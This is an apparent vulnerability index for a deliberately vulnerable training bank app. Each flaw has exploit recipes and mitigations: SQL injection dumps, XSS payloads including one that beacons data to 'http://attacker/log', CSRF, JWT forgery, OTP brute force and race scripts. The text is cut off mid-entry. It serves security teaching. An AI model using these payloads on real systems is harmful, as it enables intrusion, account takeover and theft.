================================================================================
 NovaTrust Bank (vuln-bank) — Vulnerability index, exploit recipes, mitigations
================================================================================

Default base URL:   http://localhost:3001
Test credentials:
  alice.chen       / Password123!         (customer)
  bob.martinez     / Sunshine99           (customer)
  carol.singh      / autumn2023           (customer)
  david.okafor     / Letmein2024          (customer; large balance)
  eva.lindstrom    / fika4life            (customer)
  julie.morgan     / Admin2024!           (admin)
  finance_audit    / AuditTeam2024        (admin; ops account)

Default OTP for MFA:  424242
Default reset token:  printed on stdout when /forgot is hit
Hidden secret in JS bundle: sk_live_NOVATRUST_DEBUG_4242424242424242

--------------------------------------------------------------------------------
 INDEX
--------------------------------------------------------------------------------
 [01]  SQL injection — login form (MySQL)                       (Ch 11)
 [02]  SQL injection — accounts search (MySQL, UNION/blind/time/stacked/OOB) (Ch 11)
 [03]  SQL injection — admin user search                     (Ch 11)
 [03a] SQL injection — header sink on /sqli/lookup            (Ch 11)
 [03b] SQL injection — naive WAF blacklist bypass on /sqli/safe-lookup (Ch 11)
 [03c] SQL injection — OOB INTO OUTFILE on /sqli/oob/leak     (Ch 11)
 [04]  Reflected XSS — search result page   (Ch 14)
 [05]  Stored XSS — support messages        (Ch 14)
 [06]  DOM-based XSS — location.hash sink   (Ch 14, 34)
 [06a] Reflected XSS — naive blacklist (?strict=1) on search (Ch 14)
 [06b] Reflected XSS — attribute context on search refine input (Ch 14)
 [06c] Reflected XSS — JavaScript-string context on /login ?next= (Ch 14)
 [06d] DOM XSS — location.search ?banner= sink (Ch 14)
 [06e] Reflected XSS — javascript: URL (href) context on /accounts ?payto= (Ch 14)
 [06f] DOM XSS — postMessage (no origin check) on statement print bridge (Ch 14)

 [07]  IDOR / BAC — view any account        (Ch 11)
 [08]  BAC — admin endpoints unprotected    (Ch 11)
 [09]  BAC — privilege escalation via GET   (Ch 11, 23)
 [10]  Mass assignment — register w/ role=admin (A08, Ch 32)
 [11]  Mass assignment — API PUT /users/:id (Ch 32 API3)
 [12]  Prototype pollution — lodash.merge   (Ch 31)
 [13]  Race conditions (Ch 21): balance overdraw (/transfer/send) + gift-card limit overrun
        (/rewards/redeem) + OTP rate-limit bypass (/security/verify) + multi-endpoint confirm
        (/transfer/initiate,confirm) + time-sensitive login code (/login/code)
 [14]  No CSRF protection — GET transfer     (Ch 23)
 [15]  Clickjacking — no X-Frame-Options     (Ch 23)
 [16]  Open redirect — /go?u= and /login?next= (Ch 16)
 [17]  Weak password hashing (MD5)           (Ch 12)
 [18]  JWT — alg=none accepted               (Ch 26)
 [19]  JWT — weak HS256 secret               (Ch 26)
 [19a] JWT — Partner API v2: algorithm confusion + jwk/jku/kid injection (Ch 18)
 [20]  MFA bypass — client-controlled success (Ch 19)
 [21]  No rate limiting — MFA + reset brute force (Ch 19)
 [22]  Weak password reset — 4-digit numeric token (Ch 16, 19)
 [23]  User enumeration — login + reset messages (Ch 19)
 [24]  SSRF — webhook validation + statement import (Ch 22)
 [25]  XXE — XML statement import            (Ch 25)
 [26]  Path traversal — /statements/file?name= (Ch 11, A05)
 [27]  Arbitrary file upload — multer disk storage (Ch 24)
 [28]  Excessive data exposure — /api/me returns SSN + password_md5 (Ch 32 API3)
 [29]  BOLA — /api/users/:id, /api/accounts/:id (Ch 32 API1)
 [30]  Improper inventory — /api/v1/users unauth (Ch 32 API9)
 [30a] URC (API4) — POST /api/batch, no array-size cap (amplification) (Ch 20)
 [30b] BFLA (API5) — /api/admin/users + /api/admin/users/:id/role, no role check (Ch 20)
 [30c] Sensitive flow (API6) — POST /api/transfers, no ownership/limit/idempotency (Ch 20)
 [30d] Unsafe consumption (API10) / SSRF (API7) — GET /api/fx?provider= trusts caller URL+reply (Ch 20)
 [30e] Improper inventory (API9) — public /api/openapi.json + /api/swagger.json spec (Ch 20)
 [30f] API-backed UI — GET /api/token bridge; Profile calls GET /api/me + PUT /api/users/:id,
       Transfer calls POST /api/transfers (real requests captured by using the app) (Ch 20)
 [31]  CORS — origin reflection w/ credentials (Ch 17, 23)
 [32]  Cache poisoning — X-Forwarded-Host echoed in Link header (Ch 31)
 [33]  Debug endpoint exposed — /debug        (Ch 17)
 [34]  Verbose error pages — full stack trace (Ch 17)
 [35]  Source-map disclosure — /static/js/app.js.map (Ch 34)
 [36]  Secret in JS bundle — sk_live_... (Ch 34)
 [37]  Sensitive data over HTTP — no HSTS / Secure cookie (Ch 12)
 [38]  Insecure session cookie — HttpOnly=false, no SameSite (Ch 19)
 [39]  Business logic — negative-amount transfer (Ch 16)
 [40]  Vulnerable component — jQuery 1.12.4 loaded (Ch 18)
 [41]  Audit logging — no failed-login records (Ch 21)
 [42]  Information leak — admin views return password_md5 + SSN in JSON (Ch 12)
 [43]  OAuth — lax redirect_uri (prefix match)        (Ch 24)
 [44]  OAuth — state parameter not validated by RP    (Ch 24)
 [45]  OAuth — implicit flow (token in URL fragment)  (Ch 24)
 [46]  OAuth — PKCE code_challenge_method=plain accepted (Ch 24)
 [47]  OAuth — authorization code reusable, 24h TTL   (Ch 24)
 [48]  OAuth — id_token alg=none accepted by IdP & RP (Ch 18, 24)
 [49]  OAuth — /userinfo ignores scope (returns full PII) (Ch 24)
 [50]  OAuth — nOAuth (prompt=none + login_hint = ATO) (Ch 24)
 [51]  OAuth — ROPC grant on public client            (Ch 24)
 [52]  OAuth — predictable refresh tokens             (Ch 24)
 [53]  Security misconfig — /.env at web root         (Ch 33, A05)
 [54]  Security misconfig — /.git/ exposed            (Ch 33, A05)
 [55]  Security misconfig — /internal/dashboard default creds admin:admin (Ch 33)
 [56]  Security misconfig — verbose Server + X-Powered-By banner (Ch 33)
 [57]  Security misconfig — backup file /static/backup/admin.js.bak (Ch 33)
 [58]  Security misconfig — support-token bypass header (Ch 33)
 [59]  Security misconfig — CORS reflected origin + credentials on /api (Ch 33)
 [60]  Security misconfig — /uploads/ directory listing enabled (Ch 33)
 [61]  Vulnerable component — jQuery 1.12.4 `$()` HTML parsing → DOM XSS via ?theme= (Ch 34)
 [62]  Software & Data Integrity — POST /admin/integrity/install accepts unsigned plugin code → RCE (Ch 35)
 [63]  Logging & Monitoring — failed logins and SSN-view actions are not audited; /admin/audit reachable by any logged-in user; CRLF log forgery via /forgot email (Ch 36)
 [64]  Client-side / modern frontend — no CSP, no SRI on jQuery/Bootstrap CDNs, postMessage/origin checks missing in cross-frame admin tooling (Ch 37)
 [65]  File upload → RCE — NovaTrust Applications Center (PHP portal, :3010) (Ch 17)
 [65]  OS command injection — /admin/diagnostics ?host= → /bin/sh (Ch 12)
 [66]  XPath injection — /admin/directory ?name= over staff-directory.xml (Ch 12)


--------------------------------------------------------------------------------
 [01] SQL injection — login form (MySQL)
--------------------------------------------------------------------------------
Endpoint:   POST /login
Files:      routes/auth.js (login handler concatenates `username` into SQL)
Backend:    MySQL 8 via mysql2 (lib/db.js with multipleStatements:true)

EXPLOIT (login bypass as admin julie.morgan)
  # MySQL requires the line-comment marker to be followed by whitespace
  # OR the alternate marker `#` (which needs no trailing space). The bare
  # `--` does NOT comment in MySQL and returns HTTP 500.
  curl -i -X POST http://localhost:3001/login \
    --data-urlencode "username=julie.morgan'#" \
    --data-urlencode 'password=x'
  # → HTTP 302 Location: /accounts (signed in as julie.morgan)

  # Equivalent with -- + trailing space:
  curl -i -X POST http://localhost:3001/login \
    --data-urlencode "username=julie.morgan'-- " \
    --data-urlencode 'password=x'
  # → HTTP 302

MITIGATION
  Use parameterised queries: `db.prepare('SELECT * FROM users WHERE username = ?').get(username)`.
  Verify the password with a constant-time comparator after argon2id.
  Set multipleStatements:false on the MySQL connection.

--------------------------------------------------------------------------------
 [02] SQL injection — accounts search (MySQL, all techniques)
--------------------------------------------------------------------------------
Endpoint:   GET /accounts/search?q=...    (any authenticated user)

ERROR PROBE
  # Single `'` parses silently in MySQL via modulo coercion. Use `'a`.
  /accounts/search?q='a   → 500, leaks query fragment + MySQL banner

UNION EXTRACTION
  # 3-column UNION; CONCAT is required (|| is boolean OR in MySQL).
  # MySQL line comments require trailing whitespace; `-- -` survives URL
  # encoding because the trailing `-` blocks form `+` -> space stripping.
  /accounts/search?q=' UNION SELECT 0, CONCAT(username,'/',password_md5,'/',ssn), 0 FROM users-- -
  # → row per user in vulnbank.users (alice, bob, carol, david, eva,
  #   julie, finance_audit, backdoor).

BOOLEAN-BLIND ORACLE
  /accounts/search?q=' AND 1=1#   → 200, ~2546 bytes (Alice row included)
  /accounts/search?q=' AND 1=2#   → 200, ~1298 bytes (empty)
  # ~1.2KB delta is the yes/no signal. Iterate with SUBSTRING() on a
  # subquery to extract julie's MD5 one hex digit at a time.

TIME-BASED BLIND
  /accounts/search?q=' UNION SELECT SLEEP(3),2,3#   → ~3.0s response
  /accounts/search?q=' AND IF(SUBSTRING((SELECT password_md5 FROM users WHERE username='julie.morgan'),1,1)='7',SLEEP(3),0)#
  # → 3s when bit matches, instant when not. First digit of julie's hash is `7`.

STACKED QUERY (multipleStatements:true on mysql2 connection)
  /accounts/search?q=chen'; INSERT INTO users (username,password_md5,role,full_name,email,ssn) VALUES ('backdoor2','2c103f2c4ed1e59c0b4e2e01821770fa','admin','BD2','b2@x.test','000-00-0001');-- -
  # → HTTP 200 with the original chen-row result. A new admin row exists.
  # Hash 2c10... = md5('Password123!'). Log in as backdoor2/Password123! → admin.

OUT-OF-BAND FILE WRITE (FILE grant present, secure_file_priv empty)
  /accounts/search?q=' UNION SELECT username,password_md5,ssn FROM users INTO OUTFILE '/var/lib/mysql-files/leak.txt'-- -
  # → HTTP 200, empty page. File on DB server contains tab-separated
  #   credentials for every user. Read with:
  #   docker compose exec mysql cat /var/lib/mysql-files/leak.txt

FINGERPRINT (UNION extracts MySQL version)
  /accounts/search?q=' UNION SELECT 0,@@version,0-- -   → e.g. "8.0.35"

MITIGATION
  - Parameterise: `db.prepare('SELECT ... WHERE full_name LIKE ? OR account_number LIKE ?').all('%'+q+'%','%'+q+'%')`.
  - Set multipleStatements:false on the mysql2 connection (closes stacked).
  - REVOKE FILE ON *.* FROM 'bank'@'%' (closes INTO OUTFILE / LOAD_FILE).
  - Set secure_file_priv=NULL in my.cnf to disable file I/O entirely.
  - Strip SQL fragments from 500 error pages.

--------------------------------------------------------------------------------
 [03] SQL injection — admin user search (MySQL)
--------------------------------------------------------------------------------
Endpoint:   GET /admin/users?q=...    (julie.morgan or any account elevated via [01])

EXPLOIT
  # 7-column UNION (admin user-search renders 7 columns).
  /admin/users?q=' UNION SELECT 1,username,password_md5,email,ssn,role,0 FROM users-- -

MITIGATION
  Parameterised query AND a real role check in middleware (currently any
  authenticated session reaches /admin/users — see [08]).

--------------------------------------------------------------------------------
 [03a] SQL injection — header sink on /sqli/lookup
--------------------------------------------------------------------------------
Endpoint:   GET /sqli/lookup    (any authenticated session)
Header:     X-Customer-ID  (interpolated directly into SQL WHERE clause)
File:       routes/sqli.js (lines 27–42)

EXPLOIT
  # Legit
  curl -b sess.jar -H 'X-Customer-ID: 1' http://localhost:3001/sqli/lookup
  # → {"sql":"... WHERE id = 1","rows":[{alice...}]}

  # UNION through the header (4-column SELECT)
  curl -b sess.jar \
    -H 'X-Customer-ID: 0 UNION SELECT username,password_md5,ssn,full_name FROM users-- -' \
    http://localhost:3001/sqli/lookup
  # → JSON with every user row exposed.

MITIGATION
  Bind the header value as a parameter; cast to integer at the boundary;
  treat headers as untrusted input (most WAFs do not fuzz custom headers).

--------------------------------------------------------------------------------
 [03b] SQL injection — naive WAF blacklist bypass on /sqli/safe-lookup
--------------------------------------------------------------------------------
Endpoint:   GET /sqli/safe-lookup    (any authenticated session)
Header:     X-Customer-ID  (rejected if matches /union\s+select/i, /--/, /;/)
File:       routes/sqli.js (lines 51–63)

EXPLOIT
  # Blocked: literal UNION SELECT
  curl -b sess.jar -H 'X-Customer-ID: 0 UNION SELECT username,password_md5,ssn,full_name FROM users-- -' \
    http://localhost:3001/sqli/safe-lookup
  # → {"error":"WAF blocked: /union\\s+select/i"}

  # Bypassed: SQL inline comment between UNION and SELECT, # instead of --
  curl -b sess.jar -H 'X-Customer-ID: 0 UNION/**/SELECT username,password_md5,ssn,full_name FROM users#' \
    http://localhost:3001/sqli/safe-lookup
  # → JSON with every user row exposed.

MITIGATION
  Pattern-matching SQL keywords from outside the parser is unsound; the only
  fix is parameter binding (which makes the WAF unnecessary).

--------------------------------------------------------------------------------
 [03c] SQL injection — OOB INTO OUTFILE on /sqli/oob/leak
--------------------------------------------------------------------------------
Endpoint:   GET /sqli/oob/leak?path=<path>    (any authenticated session)
File:       routes/sqli.js (lines 69–77)

EXPLOIT
  curl -b sess.jar 'http://localhost:3001/sqli/oob/leak?path=/var/lib/mysql-files/leak.txt'
  # → {"ok":true}; cat /var/lib/mysql-files/leak.txt on DB server shows full dump.

MITIGATION
  This route is a deliberate convenience wrapper for the chapter. In real
  code: REVOKE FILE from the application account; set secure_file_priv to
  a controlled directory; never expose a SQL-building helper to user input.

--------------------------------------------------------------------------------
 [04] Reflected XSS — search result page
--------------------------------------------------------------------------------
Endpoint:   GET /accounts/search?q=<svg onload=alert(1)>

EXPLOIT
  Visit /accounts/search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
  The search heading renders `<%- q %>` unescaped.

MITIGATION
  Use `<%= q %>` (HTML-escaping) or sanitise with a strict allow-list.

--------------------------------------------------------------------------------
 [05] Stored XSS — support messages
--------------------------------------------------------------------------------
Endpoint:   POST /support/submit  (any logged-in user)
Triggered:  Admin views /admin

EXPLOIT
  1. Log in as alice.chen.
  2. /support submit with body:
        <img src=x onerror="fetch('/api/me',{credentials:'include'}).then(r=>r.text()).then(t=>navigator.sendBeacon('http://attacker/log',t))">
  3. Admin (julie.morgan) loads /admin — payload fires in their browser.

MITIGATION
  Render with `<%= %>` (escaped) or sanitise via DOMPurify on render. Add CSP
  to block inline event handlers and external script loads.

--------------------------------------------------------------------------------
 [06] DOM-based XSS — location.hash sink
--------------------------------------------------------------------------------
File:       public/js/app.js  (slot.innerHTML = decoded hash)

EXPLOIT
  http://localhost:3001/accounts#<img src=x onerror=alert(document.cookie)>

MITIGATION
  Use `textContent` instead of `innerHTML`, or sanitise with DOMPurify.

--------------------------------------------------------------------------------
 [06a] Reflected XSS — naive blacklist on /accounts/search?strict=1
--------------------------------------------------------------------------------
Endpoint:   GET /accounts/search?q=<payload>&strict=1
File:       routes/accounts.js (single-pass /<script[^>]*>.*?<\/script>/gi)

EXPLOIT (each bypass survives the filter and fires in the heading sink)
  /accounts/search?strict=1&q=%3Csvg%20onload%3Dalert(1)%3E
  /accounts/search?strict=1&q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
  /accounts/search?strict=1&q=%3Ciframe%20srcdoc%3D%22%3Cscript%3Ealert(1)%3C%2Fscript%3E%22%3E
  /accounts/search?strict=1&q=%3Cdetails%20open%20ontoggle%3Dalert(1)%3E
  /accounts/search?strict=1&q=%3Cmath%3E%3Cmtext%3E%3C%2Fmtext%3E%3Cmglyph%3E%3Cxss%20src%3Dx%20onerror%3Dalert(1)%3E
  # the filter only matches the literal <script>...</script> shape, so
  # every other tag family slips through trivially.

MITIGATION
  Do not blacklist. Either HTML-escape (`<%= %>`) or run output through a
  context-aware sanitiser (DOMPurify) with an explicit allow-list.

--------------------------------------------------------------------------------
 [06b] Reflected XSS — attribute context on /accounts/search refine input
--------------------------------------------------------------------------------
File:       views/account_search.ejs (<input value="<%- q %>">)

EXPLOIT (break out of the value="..." attribute, no </h1> needed)
  /accounts/search?q=%22%20autofocus%20onfocus%3Dalert(1)%20x%3D%22
  # i.e. q = " autofocus onfocus=alert(1) x="
  # The rendered HTML becomes: <input value="" autofocus onfocus=alert(1) x="">

MITIGATION
  Use the attribute-context escape (`<%= q %>` does this for EJS, encoding
  `"` to `&quot;` so the attribute cannot be broken out of). Or render the
  value via JavaScript with `input.value = q` and never inline it.

--------------------------------------------------------------------------------
 [06c] Reflected XSS — JavaScript string-literal context on /login ?next=
--------------------------------------------------------------------------------
Endpoint:   GET /login?next=<payload>
File:       views/login.ejs
            <script>var lastNext = "<%- next.replace(/"/g,'\\\"') %>";</script>

EXPLOIT (the developer escaped `"` but forgot to escape `\`, so a payload
ending in `\` consumes the escape of the following `"`, ending the string
exactly where the developer thought it was safest)
  /login?next=%5C%22%3Balert(1)%3B%2F%2F
  # i.e. next = \";alert(1);//
  # Rendered: var lastNext = "\\";alert(1);//";
  #   -> string ends after `\\`, then a literal `;alert(1);//` statement
  #   -> alert(1) fires on page load

MITIGATION
  Never reflect user input into an inline <script>. If you must, JSON.stringify
  the value AND HTML-escape the output: `<%= JSON.stringify(next) %>`. Better:
  expose the value via a `data-*` attribute and read it with dataset.

--------------------------------------------------------------------------------
 [06d] DOM XSS — location.search ?banner= sink
--------------------------------------------------------------------------------
File:       public/js/app.js  (slot.innerHTML = URLSearchParams('banner'))

EXPLOIT (unlike the hash sink, this query parameter IS sent to the server, so
Reqlore History will show the request, but the actual rendering happens in
the browser DOM and the value never touches a template)
  http://localhost:3001/accounts?banner=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E

MITIGATION
  Use `textContent`, or sanitise the value via DOMPurify before assigning
  to `innerHTML`. Better: do not read URL state into the DOM at all without
  a strict allow-list of values.

--------------------------------------------------------------------------------
 [06e] Reflected XSS — javascript: URL (href) context on /accounts ?payto=
--------------------------------------------------------------------------------
File:       routes/accounts.js (payto passed raw) + views/accounts.ejs
            (<a href="<%- payto %>">continue to biller</a>)

EXPLOIT (payto is dropped into an href with no scheme check, so a javascript:
URL runs when the "resume payment" link is followed)
  http://localhost:3001/accounts?payto=javascript:confirm(document.domain)
  Follow the "continue to biller »" link. The confirm() dialog proves
  execution. A href sink needs a click (unlike an onerror sink), so it is a
  good place to demonstrate a modal other than alert().

MITIGATION
  Allow-list URL schemes to {http, https, mailto}; reject javascript:, data:,
  and vbscript:. HTML-escape the value inside the attribute.

--------------------------------------------------------------------------------
 [06f] DOM XSS — postMessage with no origin check (statement print bridge)
--------------------------------------------------------------------------------
File:       public/js/app.js (window.addEventListener('message', ...) ->
            #print-status innerHTML)

EXPLOIT (the print-preview bridge accepts a postMessage from any origin and
drops it into innerHTML; host an attacker page that frames the bank)
  <iframe id=f src="http://localhost:3001/accounts"></iframe>
  <script>
    f.onload = () => f.contentWindow.postMessage(
      '<img src=x onerror=confirm(document.domain)>', '*');
  </script>
  Open the attacker page in a browser already logged into the bank.

MITIGATION
  Check e.origin against an allow-list before trusting a message; render the
  status text with textContent, never innerHTML.

--------------------------------------------------------------------------------
 [07] IDOR / BAC — view any account
--------------------------------------------------------------------------------
Endpoint:   GET /accounts/:id

EXPLOIT
  Log in as eva.lindstrom. Walk IDs 1..10:
    for i in 1..10; do curl -b cookies http://localhost:3001/accounts/$i; done
  All other customers' accounts are returned, including balance and recent tx.

MITIGATION
  Add `WHERE id = ? AND user_id = ?` to the lookup query.

--------------------------------------------------------------------------------
 [08] BAC — admin endpoints unprotected
--------------------------------------------------------------------------------
Endpoints:  /admin, /admin/users, /admin/users/:id, /admin/promote, /admin/users/:id/delete

EXPLOIT
  Log in as any customer (alice.chen). Visit /admin directly.

MITIGATION
  Add `requireRole('admin')` middleware to the whole /admin sub-tree.

--------------------------------------------------------------------------------
 [09] BAC — privilege escalation via GET
--------------------------------------------------------------------------------
Endpoint:   GET /admin/promote?id=<your-id>

EXPLOIT
  Same as [08] plus: visit /admin/promote?id=1 to make user id=1 an admin.
  Combine with [14] — an attacker page can <img src> this URL while alice is
  logged in to silently promote a target.

MITIGATION
  Use POST + CSRF token + role check.

--------------------------------------------------------------------------------
 [10] Mass assignment — register w/ role=admin
--------------------------------------------------------------------------------
Endpoint:   POST /register

EXPLOIT
  curl -d "username=evilbob&password=p&email=e@e&role=admin" \
    http://localhost:3001/register
  Log in as evilbob — full admin access.

MITIGATION
  Whitelist the fields the controller accepts; never accept `role` from the form.

--------------------------------------------------------------------------------
 [11] Mass assignment — API PUT /users/:id
--------------------------------------------------------------------------------
Endpoint:   PUT /api/users/:id

EXPLOIT
  TOKEN=$(curl -s -d '{"username":"alice.chen","password":"Password123!"}' \
    -H 'Content-Type: application/json' http://localhost:3001/api/login | jq -r .token)
  curl -X PUT -H "Authorization: Bearer $TOKEN" -H 'Content-Type: application/json' \
    http://localhost:3001/api/users/1 -d '{"role":"admin","mfa_enabled":0}'

MITIGATION
  Allow-list updatable fields by role; never expose `role` to the customer
  endpoint.

--------------------------------------------------------------------------------
 [12] Prototype pollution — lodash.merge
--------------------------------------------------------------------------------
Endpoint:   POST /profile  (settings JSON merged into profile)

EXPLOIT
  1. As alice.chen, POST /profile with form field:
       settings = {"__proto__":{"isAdmin":true,"overdraftLimit":99999999}}
  2. Call /profile/admin-check — response shows `isAdmin: true`.

MITIGATION
  Use `Object.assign({}, target, source)` w/ key filter, or use `lodash.mergeWith`
  with a customizer that rejects `__proto__`/`prototype`/`constructor`. Upgrade
  lodash to 4.17.21+ and pair with a Map-based settings store.

--------------------------------------------------------------------------------
 [13] Race condition — balance overdraw + gift-card limit overrun (Ch 21)
--------------------------------------------------------------------------------
Endpoints:  POST /transfer/send (or GET /transfer/send)   -> routes/transfers.js
            POST /rewards/redeem                           -> routes/rewards.js

Both sinks are read-check-write with a REAL async gap between the check and the
write (`await sleep(200)`), so overlapping requests all pass the check before
any of them writes. (The gap must be an async yield: a synchronous busy-spin
would block Node's single thread and NOT race.)

EXPLOIT (overdraw)
  # ~$12,487.50 in 4002-1188-0001; fire 10 transfers of $10,000 in parallel:
  seq 10 | xargs -P10 -I{} curl -s -b cookies -o /dev/null \
    "http://localhost:3001/transfer/send?from=4002-1188-0001&to=4002-1188-0002&amount=1000000&memo=r{}"
  # 3+ succeed past the balance check -> the source balance goes negative.

EXPLOIT (gift-card limit overrun)
  # NOVA-WELCOME-50 is a single-use $50 code; redeem it many times at once:
  seq 25 | xargs -P25 -I{} curl -s -b cookies -o /dev/null \
    -d "code=NOVA-WELCOME-50" http://localhost:3001/rewards/redeem
  # 4+ redemptions land -> checking credited 4 x $50 = $200 from one $50 card,
  # while the card ends flagged redeemed=1. Codes: NOVA-WELCOME-50 ($50),
  # NOVA-BONUS-25 ($25), NOVA-USED-10 (already spent).

MITIGATION
  Collapse read-check-write into ONE atomic, conditional statement the DB
  serialises, then act only when it changed a row:
    transfer:  UPDATE accounts SET balance_cents = balance_cents - ?
               WHERE id = ? AND balance_cents >= ?           (check changes===1)
    gift card: UPDATE gift_cards SET redeemed = 1, redeemed_by = ?
               WHERE code = ? AND redeemed = 0               (credit iff changes===1)
  Or wrap the sequence in a transaction with row locking (SELECT ... FOR UPDATE),
  an optimistic version column, or an app-level lock (Redis) across instances.

MORE RACE SINKS (Ch 21) — all read-check-write with a real `await` gap:

  [13b] OTP rate-limit bypass — POST /security/verify (routes/security.js)
    A step-up code allows 5 wrong tries then locks. verify reads attempts,
    checks < 5, awaits, then increments on a miss -> racing N guesses all pass
    the gate before the counter catches up, so the lock never trips.
      curl -s -b cookies http://localhost:3001/security/verify -o /dev/null   # mints a challenge
      # then race wrong guesses (id from otp_challenges):
      seq 30 | xargs -P30 -I{} curl -s -b cookies -o /dev/null \
        -d "challenge_id=<id>&code=000000" http://localhost:3001/security/verify
      # tested: attempts reached 10 (>5) -> the 5-try anti-brute-force is defeated.
    FIX: UPDATE otp_challenges SET attempts=attempts+1 WHERE id=? AND attempts<5 (act on changes).

  [13c] Multi-endpoint race — POST /transfer/initiate then race POST /transfer/confirm
    A large transfer is staged (pending) then confirmed. confirm checks
    status='pending', awaits, then debits + marks executed. Racing confirm
    executes ONE authorised transfer many times.
      # initiate returns /transfer/confirm/<id>; then:
      seq 20 | xargs -P20 -I{} curl -s -b cookies -o /dev/null -d "id=<id>" \
        http://localhost:3001/transfer/confirm
      # tested: one $1,000 authorisation executed 5x -> $5,000 debited.
    FIX: UPDATE pending_transfers SET status='executed' WHERE id=? AND status='pending' (debit iff changes===1).

  [13d] Time-sensitive login code — POST /login/code/request (routes/passwordless.js)
    The passwordless code = f(current second), so two requests in the same
    second get the SAME code. Request a code for the victim AND yourself at the
    same instant -> identical code -> sign in as the victim with the code sent
    to YOUR inbox.
      ( curl -s -d email=victim@... .../login/code/request &
        curl -s -d email=attacker@... .../login/code/request & wait )
      # tested: both codes were 596985 -> then POST /login/code/verify {victim,code}.
    FIX: crypto.randomInt per account; never derive a secret from a clock.

--------------------------------------------------------------------------------
 [14] No CSRF protection — GET transfer
--------------------------------------------------------------------------------
Endpoint:   GET /transfer/send

EXPLOIT
  Host this on attacker.example:
    <img src="http://localhost:3001/transfer/send?from=4002-1188-0001&to=4002-9999-0001&amount=999999&memo=hi" />
  Browse to it while alice.chen is logged in → transfer sent.

MITIGATION
  Disallow state-changing GETs. Add a synchroniser/double-submit CSRF token
  to all POSTs. Set SameSite=Lax on the session cookie at minimum.

--------------------------------------------------------------------------------
 [15] Clickjacking — no X-Frame-Options
--------------------------------------------------------------------------------
EXPLOIT
  <iframe src="http://localhost:3001/admin/promote?id=2"></iframe>
  Style the iframe transparent and overlay a "Win a prize" button.

MITIGATION
  Set `X-Frame-Options: DENY` (or CSP `frame-ancestors 'none'`) for all
  authenticated pages.

--------------------------------------------------------------------------------
 [16] Open redirect — /go?u= and /login?next=
--------------------------------------------------------------------------------
EXPLOIT
  http://localhost:3001/go?u=https://evil.example.com/phish
  http://localhost:3001/login?next=https://evil.example.com/phish

MITIGATION
  Validate the destination: allow only relative paths starting with `/` and
  not `//`. For external redirects, require an allow-list of hostnames.

--------------------------------------------------------------------------------
 [17] Weak password hashing (MD5)
--------------------------------------------------------------------------------
File:       lib/auth.js — md5(password)

EXPLOIT
  Dump users via [02] / [11], crack hashes:
    hashcat -m 0 hashes.txt rockyou.txt
  All seeded passwords crack in seconds.

MITIGATION
  argon2id (preferred) or bcrypt with cost ≥ 12. Add per-user salt.

--------------------------------------------------------------------------------
 [18] JWT — alg=none accepted
--------------------------------------------------------------------------------
File:       lib/auth.js — verifyToken trusts alg=none

EXPLOIT
  python -c "import json,base64;h=base64.urlsafe_b64encode(b'{\"alg\":\"none\",\"typ\":\"JWT\"}').strip(b'=');\
  p=base64.urlsafe_b64encode(b'{\"sub\":1,\"username\":\"alice.chen\",\"role\":\"admin\"}').strip(b'=');\
  print((h+b'.'+p+b'.').decode())"
  curl -H "Authorization: Bearer <token>" http://localhost:3001/api/me

MITIGATION
  Never pass `none` to `algorithms`. Pin to `['HS256']` or `['RS256']`.

--------------------------------------------------------------------------------
 [19] JWT — weak HS256 secret
--------------------------------------------------------------------------------
Secret:     bank-dev-secret-2024

EXPLOIT
  jwt_tool -C -d /usr/share/wordlists/jwt.secrets.list <token>
  hashcat -m 16500 <token> rockyou.txt

MITIGATION
  Use 256-bit random secrets stored in a KMS/secret store.

--------------------------------------------------------------------------------
 [19a] JWT — Partner API v2 header-injection & algorithm confusion (Ch 18)
--------------------------------------------------------------------------------
Files:      lib/jwt-lab.js (verifier), routes/apiv2.js (endpoints),
            routes/connected.js + views/connected.ejs (first-party API surface)
Base:       http://localhost:3001/api/v2  (RS256 + published JWKS)
Discovery:  The bank web front-end is API-backed. Just sign in: the account
            dashboard fetches GET /connected/token (session->RS256 bridge),
            then GET /api/v2/me with that Bearer -> both land in History, so
            the v2 surface is reachable by using the app (no prior knowledge).
            Settings -> "Connected apps & API access" (GET /connected) shows
            the token and links the JWKS. The admin endpoint is NOT advertised;
            find /api/v2/admin/report by enumerating /api/v2/* (improper
            inventory, [30]). A customer token gets 403 there -> the motive to
            forge role=admin four ways.
Endpoints:  GET  /connected               -> Settings: connected apps & API access
            GET  /connected/token         -> RS256 access_token for the session
            POST /api/v2/login            -> RS256 access_token
            GET  /api/v2/.well-known/jwks.json  -> public key set
            GET  /api/v2/me               -> whoami (verified by verifyV2)
            GET  /api/v2/admin/report     -> role-gated proof endpoint (recon)
The verifier honours whatever the token header asks for (precedence
jwk -> jku -> kid -> alg), so it is vulnerable four ways. All tested to
a live /api/v2/admin/report 200.

EXPLOIT (forge role:admin any one of these)
  D. Algorithm confusion: fetch JWKS public key, convert JWK->PEM, sign an
     alg=HS256 token using the PEM as the HMAC secret (server accepts RS256
     AND HS256 with its public key).
  A. jwk injection: put your own RSA public key in the header `jwk`, sign
     with your private key.
  B. jku injection (SSRF): host {"keys":[your-jwk]} at a URL the server can
     reach, set header `jku` to it, sign with your private key.
  C. kid path traversal: kid=../../../../../../dev/null -> key file is empty
     -> sign HS256 with an empty secret.

MITIGATION
  Pin ONE algorithm and pass a typed KeyObject (the library then refuses to
  use an RSA key as an HMAC secret); reject jwk/jku/x5u headers; resolve kid
  against a server-side allow-list Map (never a filesystem path or SQL);
  verify iss/aud.

--------------------------------------------------------------------------------
 [20] MFA bypass — client-controlled success
--------------------------------------------------------------------------------
Endpoint:   POST /mfa/verify

EXPLOIT
  Log in as a user that has mfa_enabled=1 (enable it via PUT /api/users/:id).
  Then:
    curl -b cookies -d 'success=true&next=/accounts' http://localhost:3001/mfa/verify

MITIGATION
  Never trust client-supplied success flags. Verify the TOTP server-side and
  count attempts (lock after N failures).

--------------------------------------------------------------------------------
 [21] No rate limiting — MFA + reset brute force
--------------------------------------------------------------------------------
EXPLOIT
  for i in $(seq 0 999999); do
    code=$(printf '%06d' $i)
    s=$(curl -sb cookies -o /dev/null -w '%{http_code}' \
      -d "code=$code&next=/" http://localhost:3001/mfa/verify)
    [ "$s" = "302" ] && echo "OTP=$code" && break
  done

MITIGATION
  Per-account + per-IP attempt counters with exponential lockout and alerting.

--------------------------------------------------------------------------------
 [22] Weak password reset — 4-digit numeric token
--------------------------------------------------------------------------------
EXPLOIT
  curl -d 'email=alice.chen@gmail.com' http://localhost:3001/forgot
  # Then brute the 4-digit token (10 000 candidates):
